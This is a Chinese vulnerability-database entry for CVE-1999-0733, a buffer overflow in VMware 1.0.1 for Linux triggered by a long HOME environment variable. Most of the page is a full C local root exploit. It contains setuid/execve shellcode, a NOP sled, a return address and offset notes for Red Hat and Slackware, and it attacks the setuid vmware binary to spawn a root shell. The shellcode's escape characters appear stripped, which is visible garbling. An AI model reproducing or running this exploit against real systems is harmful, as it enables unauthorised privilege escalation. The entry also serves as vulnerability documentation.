Linux VMWare缓冲区溢出漏洞

Linux VMWare缓冲区溢出漏洞

漏洞ID 1105481 漏洞类型 缓冲区溢出
发布时间 1999-06-25 更新时间 2005-05-02
图片[1]-Linux VMWare缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0733
图片[2]-Linux VMWare缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199906-029
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19371
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199906-029
|漏洞详情
Linux的VMWare1.0.1版本存在缓冲区溢出漏洞。可以借助一个长的HOME环境变量导致该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/490/info


VMWare is virtual machine software produced by VMWare inc. VMWare version 1.0.1 for Linux is vulnerable to a buffer overflow attack. Since VMWare is installed with binaries that are setuid root, local users can exploit the hole allowing for arbitrary code to be executed as root. The consequences are a local root compromise. 

/* 
 * VMware v1.0.1 root sploit
 * funkySh 02/07/99
 * 
 * 1. Redhat 5.2     2.2.9 offset 800-1100
 * 2.                      offset 1600-2200
 * 1. Slackware 3.6  2.2.9 offset 0
 * 2.                      offset ?       
 *
 * [ 1 - started from xterm on localhost ]
 * [ 2 - started from telnet, with valid display ]
 */


#include <stdio.h> 

char code[] = "x31xdbx89xd8xb0x17xcdx80" /*setuid(0) */
              "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0c"
              "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb"
              "x89xd8x40xcdx80xe8xdcxffxffxff/bin/sh";

#define BUFFER 1032
#define NOP 0x90 
#define RET_ADDR 0xbfffdf50
#define PATH "/usr/local/bin/vmware"

char buf[BUFFER];

void main(int argc, char * argv[])
{
  int i, offset = 0;
  if(argc > 1) offset = atoi(argv[1]);

 memset(buf,NOP,BUFFER);
 memcpy(buf+800,code,strlen(code));
 for(i=854+2;i<BUFFER-2;i+=4)
   *(int *)&buf[i]=RET_ADDR+offset;

  setenv("HOME", buf, 1);
  execl(PATH,"vmware","-display","127.0.0.1:0",0);
  /* change IP if required */
}
|参考资料

来源:BID
名称:490
链接:http://www.securityfocus.com/bid/490

相关推荐: WackoWiki Unspecified Cross-Site Scripting Vulnerabilities

WackoWiki Unspecified Cross-Site Scripting Vulnerabilities 漏洞ID 1096994 漏洞类型 Input Validation Error 发布时间 2005-03-29 更新时间 2005-03-2…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享